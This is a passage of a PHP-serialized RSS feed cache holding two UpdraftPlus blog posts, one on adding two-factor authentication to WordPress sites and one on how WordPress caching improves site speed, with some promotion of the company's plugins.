2021?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/SGjl_ZI9MXE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:112:\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Aug 2021 14:19:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"2fa\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:14:\"authentication\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:8:\"password\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1211861\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:843:\"<p>Once you have created your WordPress site, there are several factors you need to consider to keep your new site safe, whether it&#8217;s making sure your site is secure, you have regular backups scheduled or that your plugins are up &#8230; <a href=\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/\">Why should you add two-factor authentications (2FA) to your WordPress site in 2021?</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:13346:\"<p><iframe loading=\"lazy\" title=\"Why should you add two-factor authentications (2FA) to your WordPress site in 2021?\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/-Mej0VbpHBs?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">Once you have created your WordPress site, there are several factors you need to consider to keep your new site safe, whether it&#8217;s making sure your site is secure, you have regular backups scheduled or that your plugins are up to date.  </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-6.png\"><img loading=\"lazy\" class=\"wp-image-1211909 aligncenter\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-6.png\" alt=\"two factor authentication\" width=\"676\" height=\"380\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-6.png 676w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-6-480x270.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 676px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">If you are establishing your business and brand in the online world, it is important to ensure that your site is not vulnerable to hackers and cyber attacks.  </span></p>\n<p><span style=\"font-weight: 400;\">According to </span><a href=\"https://cobalt.io/blog/cybersecurity-statistics-2021\"><span style=\"font-weight: 400;\">Security Magazine</span></a><span style=\"font-weight: 400;\">:  “Every day, there are over 2,200 cyberattacks &#8211; which is nearly one every 39  seconds.”</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">43% of small businesses have no cybersecurity defense plan in place. </span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">60% of small business owners do not think their business is a target for cybercriminals.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">74% of small business attacks were executed by external actors, as opposed to internal employees</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">84% of small business attacks focused on the monetary gain with 8% focused on espionage and the remainder focused on hacking for fun or grudges</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">22% of small businesses transitioned to remote work without a cybersecurity plan in place.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">To minimize and limit your site’s vulnerability and risk of cyber-attacks, WordPress provides you with the ability to install and use two-factor authentication</span> <span style=\"font-weight: 400;\">on your website.</span></p>\n<p><span style=\"font-weight: 400;\">In 2021</span><b>, </b><span style=\"font-weight: 400;\">it was reported that only </span><a href=\"https://www.bleepingcomputer.com/news/security/57-percent-of-businesses-use-multi-factor-auth-mfa-says-lastpass/\"><span style=\"font-weight: 400;\">57% of businesses</span></a><span style=\"font-weight: 400;\"> around the world will use some form of online Multi-Factor Auth (MFA) as a method of authentication, designed to add an extra layer of protection on top of users&#8217; login credentials. Of those employees</span><span style=\"font-weight: 400;\"> using MFA, 95% reported using a software-based 2 factor authentication tool (such a mobile phone app), while 4% have a hardware-based 2 factor authentication solution, with roughly 1% using biometrics.</span></p>\n<p><b>What is Two-Factor Authentication and how does it work? </b></p>\n<p><span style=\"font-weight: 400;\">2FA refers to the process by which the person has to complete an extra level of login security verification to show that they have the necessary permissions required to access the site, documents, applications, sales information etc.</span></p>\n<h3><b>What are authentication factors?</b></h3>\n<p><span style=\"font-weight: 400;\">While all sites will have at least one login process to access your account, there are several ways in which a user can be authenticated using an additional authentication method. Most authentication methods typically rely on the user&#8217;s knowledge factors, which includes login information such as traditional passwords. By adding an additional 2 factor authentication method, this forces the user to give extra information, which is either a possession factor or an inherence factor.</span></p>\n<p><b>Knowledge Factor &#8211; </b><span style=\"font-weight: 400;\">This refers to the typical username/passwords and pin codes through which you can access a website account. No matter what type of password you select; including numbers,  words, symbols, uppercase, and lowercase, it will still be considered ‘basic security’. </span></p>\n<p><b>Personal/Possession Factor &#8211; </b><span style=\"font-weight: 400;\">This level of security</span> <span style=\"font-weight: 400;\">factor refers to something that the user has in their possession. Examples of this can include your ID card, a previously answered security question, a one time password sent to your smart device, smartphone app verification etc. </span></p>\n<p><b>Biometric Factor &#8211; </b><span style=\"font-weight: 400;\">This can also be known as an inherence factor and is a security factor inherent in the user&#8217;s physical self. Typically, these are identified as unique personal physical characteristics such as fingerprint, facial, voice recognition or behavioral biometrics, including keystroke dynamics, gait or speech patterns.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-7.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1211910\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-7.png\" alt=\"\" width=\"627\" height=\"353\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-7.png 467w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-7-300x169.png 300w\" sizes=\"(max-width: 627px) 100vw, 627px\" /></a></p>\n<p><span style=\"font-weight: 400;\">While most two-factor authentication methods will only rely on the first three methods of authentication, there are systems that require further and more detailed security and will require further multifactor authentication (MFA), which requires two or more independent credentials for more secure login/authentication.</span></p>\n<p><b>Location and Timing Factor &#8211; </b><span style=\"font-weight: 400;\">Some sites containing sensitive and personal information that you may try to log into, such as Facebook and Google, are  designed to notify the owner if they register a user attempting to log into your account from a suspicious location or at an unusual time. If this occurs, the sites send an email to the owners to notify them of the login discrepancies.This method can be enforced by limiting authentication attempts to known user specific devices (such a model of their mobile phone), or by tracking the geographic source of an authentication attempt based on the source Internet Protocol address or some other geolocation information, such as Global Positioning System (GPS) data, derived from the user&#8217;s mobile phone or other device.</span></p>\n<p><span style=\"font-weight: 400;\">By using these 2FA methods,  multiple layers of protection can protect your website from  phishing attacks by hackers and other cyber-security problems.</span></p>\n<p><b>Is 2FA foolproof and can it be hacked? </b></p>\n<p><span style=\"font-weight: 400;\">2FA can go a very long way in making your site secure. But no matter how thorough and safe your security login process is, nothing can make it 100% safe. Even recently, the popular crypto currency trading exchange Coinbase </span><a href=\"https://www.techradar.com/uk/news/coinbase-customers-up-in-arms-after-hackers-drain-crypto-wallets\"><span style=\"font-weight: 400;\">was hacked</span></a><span style=\"font-weight: 400;\"> by actors who were able to bypass the user&#8217;s two factor authentication by cloning their mobile phones and gaining access to generated 2FA text message passcodes. </span></p>\n<p><span style=\"font-weight: 400;\">2FA security is only as secure as its weakest component. </span><span style=\"font-weight: 400;\">The National Institute of Standards and Technology (</span><a href=\"https://searchsoftwarequality.techtarget.com/definition/NIST\"><span style=\"font-weight: 400;\">NIST</span></a><span style=\"font-weight: 400;\">) has now discouraged the use of text messages in 2FA services, recommending instead that randomly generated time-limited tokens, owing to the risk of mobile phone cloning or malware that can intercept or redirect text messages.</span></p>\n<p><span style=\"font-weight: 400;\">Many large organizations, such as Google, Facebook, Uber, etc. have fallen victim to data hacks and have found their user information for sale on the dark web. Hackers&#8217; tools and methods of attacks are becoming more sophisticated and harder to detect &#8211; incorporating phishing, password spraying, ransomware and malware attacks. While security teams are constantly working to improve online security, they have yet to put an end to the possibility. </span></p>\n<p><span style=\"font-weight: 400;\">According to</span><a href=\"https://www.privacyaffairs.com/dark-web-price-index-2020/\"><span style=\"font-weight: 400;\"> Dark Web Price Index 2020</span></a><span style=\"font-weight: 400;\">: </span><span style=\"font-weight: 400;\"><br />\n</span><span style=\"font-weight: 400;\"><br />\n</span><span style=\"font-weight: 400;\">&#8220;Data samples of millions of people sold on the Dark Web range from  $25USD to $6000USD for premium accounts.&#8221;</span><b><i> </i></b></p>\n<p><span style=\"font-weight: 400;\">Typically, If the user has up-to-date security protocols, hackers will usually move on to a user that is more vulnerable and has failed to properly set up their additional security. </span></p>\n<p><b>Tips for minimizing the risk of cyberattacks:</b></p>\n<p><b>Always have a backup of your site</b><span style=\"font-weight: 400;\">: By using </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\">, you can ensure that you will have a secure and safe backup of your WordPress website. Should the worst happen and your site is the victim of a hack, you can revert to the older version of your site and make changes to your login process to make your site more secure.</span></p>\n<p><b>Ensure your site has a robust security system</b><span style=\"font-weight: 400;\">: While you can’t remove all of the risk of being hacked, you can minimize it. Ensure that you have a reputable two factor authentication login system for all users with back-end website access. Do not give unnecessary privileges to users if they do not require them, as they can be used to take control of the website. </span></p>\n<p><b>Update your plugins/themes/WordPress version</b><span style=\"font-weight: 400;\">: When hacking a WordPress site, this is the most common route of attack. Outdated plugins can be particularly vulnerable to hackers in giving them a route into your site.</span></p>\n<p><b>Make sure users are aware of the risks</b><span style=\"font-weight: 400;\">: It is vital that everyone with a higher level of access to your site be smart and aware of potential security issues. This means being aware of potential hacking attempts via email phishing scams, that may appear genuine, but are attempts to retrieve user names/passwords and install malware onto your computer.</span></p>\n<p><b>Strong passwords: </b><span style=\"font-weight: 400;\">While this may seem like the most obvious, it is also often the most overlooked. Having a strong and unpredictable password is often the first and best level of protection against most hacks. Passwords that are changed often and have a string of letters and special characters are very difficult to hack via forced password attacks. </span></p>\n<p><b>Ending Notes: </b></p>\n<p><span style=\"font-weight: 400;\">The more you know, the better your chances are of preventing any kind of cyber attack before it has even begun. A mixture of 2FA, updated software and secure passwords and help prevent the vast majority of attempted hacks. But should the worst happen, always remember that you should have a recent backup copy of your site with </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\">, which should be stored in a secure remote storage location. </span></p>\n<p><span style=\"font-weight: 400;\">If you have any suggestions or queries, feel free to comment below. We are  interested in hearing from you.</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/\">Why should you add two-factor authentications (2FA) to your WordPress site in 2021?</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"https://updraftplus.com/why-should-you-add-two-factor-authentication-2fa-to-your-wordpress-site-in-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:85:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WordPress Caching guide: How does it improve your site speed? \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/Fu-sEvzeHb0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Aug 2021 18:05:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Caching\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"how\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:5:\"speed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1206432\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:806:\"<p>In this blog, we will discuss WordPress caching; what it does &#8211; and how it improves the performance and speed of your website.  What is Caching?  To understand WordPress caching, you first have to understand the concept of caching. Caching refers &#8230; <a href=\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/\">WordPress Caching guide: How does it improve your site speed? </a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Melvin Braide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12890:\"<p><iframe loading=\"lazy\" title=\"WordPress Caching guide: How does it improve your site speed?\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/a-7wED0YwXY?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">In this blog, we will discuss WordPress caching; what it does &#8211; and how it improves the performance and speed of your website. </span></p>\n<h2><b>What is Caching? </b></h2>\n<p><span style=\"font-weight: 400;\">To understand WordPress caching, you first have to understand the concept of caching. </span><span style=\"font-weight: 400;\">Caching refers to the process of storing data in temporary folders where they are easily accessible. It’s primary aim is to reduce processing time and make information available as quickly as possible. </span></p>\n<p><span style=\"font-weight: 400;\">This is especially important in WordPress websites. WordPress websites are dynamic by default, which means that each time a user visits your site, WordPress goes through a series of steps to generate information from your database to show to the visitor. </span></p>\n<p><span style=\"font-weight: 400;\">The benefit of this process is that the user gets a somewhat customized experience, since the pages are generated specifically for them. This benefit has the drawbacks that occur as a result of the long processing time, which can make the website slower.</span></p>\n<p>When it comes to caching specifically in WordPress, it works by following the process of temporarily storing the dynamically generated files of frequently visited pages on your website as static files for easy recollection and use. Caching reduces the demand on your web server to continuously generate dynamic content. <span style=\"font-weight: 400;\">This means that when a user visits a page, the page shown to the user is stored exactly how it appeared the last time they visited, so the next time that page is requested, there’s no need for WordPress to generate a new page. It just presents the previously generated page, at a rate that is 3-5 times faster. </span></p>\n<p><span style=\"font-weight: 400;\">There are two types of content available on web pages:</span></p>\n<ul>\n<li>Static files: As the name implies, static files refer to the types of content that do not change. These types of files include images, javascript files, css stylesheets, and HTML pages. Static content remains the same regardless of the user and is created long before they are needed.</li>\n<li>Dynamic files: Dynamic content is created at the point of request, specifically for the user. This type of content is created based on the user’s location, device and time of request.</li>\n</ul>\n<p><span style=\"font-weight: 400;\">WordPress caching is the process of storing these dynamic files as static files, thereby increasing the speed and performance of your website. </span></p>\n<p><span style=\"font-weight: 400;\">There are two basic types of caching &#8211; Client-side and server-side. </span></p>\n<h4><b>Client-side Caching </b></h4>\n<p><span style=\"font-weight: 400;\">Client-side caching occurs when the temporary caching files are stored on the end user’s device. Modern browsers have the benefit of having smart coding that aims to reduce redundancies by saving static files for future use. </span></p>\n<p><span style=\"font-weight: 400;\">As a result, when users open a web-page, the browser starts downloading static files such as images, HTML pages and other multimedia content. Their browser saves all these files so it doesn’t have to re-download them every time you visit the site in the future. </span></p>\n<p><span style=\"font-weight: 400;\">While this helps with the speed of your browsing, it is recommended that you clean up your cache data once in a while so the files don’t become too bulky and reduce the performance of your browser.</span></p>\n<h4><b>Server-side Caching </b></h4>\n<p><span style=\"font-weight: 400;\">Server side caching refers to the caching protocol employed by your WordPress server to save temporary files. There are four possible protocols for WordPress Caching; </span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Page caching </span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">OPcode caching </span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Object caching </span></li>\n<li aria-level=\"1\">CDN Caching<span style=\"font-weight: 400;\"> </span></li>\n</ul>\n<h4><b>Page Caching </b></h4>\n<p><span style=\"font-weight: 400;\">Page caching occurs when your caching plugin &#8211; like WP-Optimise &#8211; saves the dynamically generated HTML files on your server’s hard disk (RAM) after the first time it is loaded. Whenever there is another request for that page, your server produces the previously generated data.</span></p>\n<h4><b>OPcode Caching </b></h4>\n<p><span style=\"font-weight: 400;\">When a PHP file is loaded on the website, OPcode caching saves the compiled PHP code. For a PHP code to execute, it must be generated and compiled by the PHP compiler. OPcode caching saves the initially generated code on the server’s RAM, to save time upon subsequent requests. </span></p>\n<h4><b>Object Caching </b></h4>\n<p><span style=\"font-weight: 400;\">Object based caching saves database queries after the first time they are requested. This way, it reduces PHP execution time and load time when the query is requested again. </span><span style=\"font-weight: 400;\">Since WordPress is a content management system that is reliant on databases, object caching seeks to reduce the load on the database and reproduce previously loaded content faster. </span><span style=\"font-weight: 400;\">This is crucial for high traffic websites. So crucial that WordPress has its own internal caching system that can be enhanced with a third party tool.</span></p>\n<h4><b>CDN Caching </b></h4>\n<p><span style=\"font-weight: 400;\">CDN (content delivery network) caching refers to the process of storing web content in proxy servers that are much closer to the end user. By using proxy servers, CDN caching helps your website to deliver content much faster. </span></p>\n<h4><b>How does WordPress Caching improve your WordPress site speed and performance?</b></h4>\n<p><span style=\"font-weight: 400;\">WordPress caching increases the speed of your website in three primary ways</span></p>\n<h4><b>Moves files to “recent memory”</b></h4>\n<p><span style=\"font-weight: 400;\">You may be aware that computers and computer systems are built to mimic the brain. Caching is a prime example of that. </span></p>\n<p><span style=\"font-weight: 400;\">When you try to remember an event from your childhood, it takes a while before you fully recollect the details. However, if you try to remember that same event days later, you remember the details almost at once. This is because your brain moved the event to a recent memory. It may surprise you to learn that you are not remembering the event, but you are in fact remembering the last time you remembered the event. </span></p>\n<p><span style=\"font-weight: 400;\">Caching adopts this same principle by storing previously loaded web elements in a “recent folder.” As a result, your web pages load faster when they are requested. </span></p>\n<h4><b>Saves files closer to the end user</b></h4>\n<p><span style=\"font-weight: 400;\">Another way caching increases the speed of your website is by delivering content that is closer to the user; either from a server close by or from the user’s hard disk. This is a combination of client-side and server-side caching. </span></p>\n<h4><b>Compress images </b></h4>\n<p><span style=\"font-weight: 400;\">Caching plugins like </span><a href=\"https://getwpo.com/buy/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\"> give you the option of compressing your images. Bulky images take more time to load which can slow down the overall speed of your website. With cache plugins, you can manually or automatically compress images to reduce load time.  </span></p>\n<h4><b>How Caching boosts performance of your WordPress website </b></h4>\n<p><span style=\"font-weight: 400;\">Caching plugins don’t only increase your load speed, but they reduce the workload on your server. The following are the ways by which caching improves your website’s performance</span></p>\n<h4><b>Improves user experience </b></h4>\n<p><span style=\"font-weight: 400;\">Consumer attention span reduced from </span><a href=\"https://www.thehindu.com/education/does-the-decrease-of-average-human-attention-span-have-an-impact-on-education/article34116513.ece\"><span style=\"font-weight: 400;\">12 seconds to 8 seconds</span></a><span style=\"font-weight: 400;\"> in just 16 years from 2000 to 2016. There’s an explanation for this; technological advancements, intense competition and over stimulation of the mind from smart devices are the most significant culprits. </span></p>\n<p><span style=\"font-weight: 400;\">This now means that you have only a few seconds to make an impression or lose the user to a potential competitor. Research suggests that slow websites are a huge turnoff to modern day internet users. </span></p>\n<p><span style=\"font-weight: 400;\">There is also a </span><a href=\"https://www.section.io/blog/page-load-time-bounce-rate/\"><span style=\"font-weight: 400;\">correlation between higher bounce rates and slower pages</span></a><span style=\"font-weight: 400;\">, which means the longer it takes your page to load, the higher your bounce rate. </span><a href=\"https://www.bluecorona.com/blog/how-fast-should-website-be/\"><span style=\"font-weight: 400;\">The ideal page load time is under 2 seconds</span></a><span style=\"font-weight: 400;\">. A load time beyond 3 seconds can increase page abandonment rate by up to 87%.  </span></p>\n<h4><b>Improves ranking </b></h4>\n<p><span style=\"font-weight: 400;\">Website speed is a performance and ranking factor for search engines. In recent times, search engines like Google have begun to penalize slow websites. Websites with longer page load times are eventually pushed farther down the pecking order and replaced by faster websites. </span></p>\n<p><span style=\"font-weight: 400;\">Google prioritizes user experience as a ranking factor and site speed is a crucial aspect of the UX. When users get disappointing experiences from the websites search engines direct them to, it reflects poorly on the search engine. Users are then less likely to trust the search engine results if that trend continues. </span></p>\n<h4><b>Boosts content availability </b></h4>\n<p><span style=\"font-weight: 400;\">Several factors affect whether or not your website will load for a user. Frequent network interruptions or network congestion for example, are two of those factors. Since WordPress dynamically generates content for the user, this could greatly affect the performance of your website for that user. </span></p>\n<p><span style=\"font-weight: 400;\">Caching solves this problem by providing an already generated page for the end user. This way, you won’t lose a potential or active customer to a poor network connection.</span></p>\n<h4><b>Cleans your database </b></h4>\n<p><span style=\"font-weight: 400;\">Caching plugins like </span><a href=\"https://getwpo.com/buy/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\"> work to clean your database by de-fragmenting MySQL tables and clearing data like trashed comments, expired transient options, pingbacks, etc. This process is important because without it, your website’s performance and speed reduces overtime. </span></p>\n<h4><b>Conclusion</b></h4>\n<p><span style=\"font-weight: 400;\">Chances are that you may never get to notice how your website interacts with every end user. You can’t tell what happens when people try to access your website from halfway across the world. But what you can do is ensure that your WordPress site’s performance and speed are optimal at all times. With WordPress caching, you don’t have to lose sleep worrying about all that. Install a reputable plugin like </span><a href=\"https://getwpo.com/buy/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\">, and buy yourself some time to focus on other aspects of your business. </span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/\">WordPress Caching guide: How does it improve your site speed? </a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for 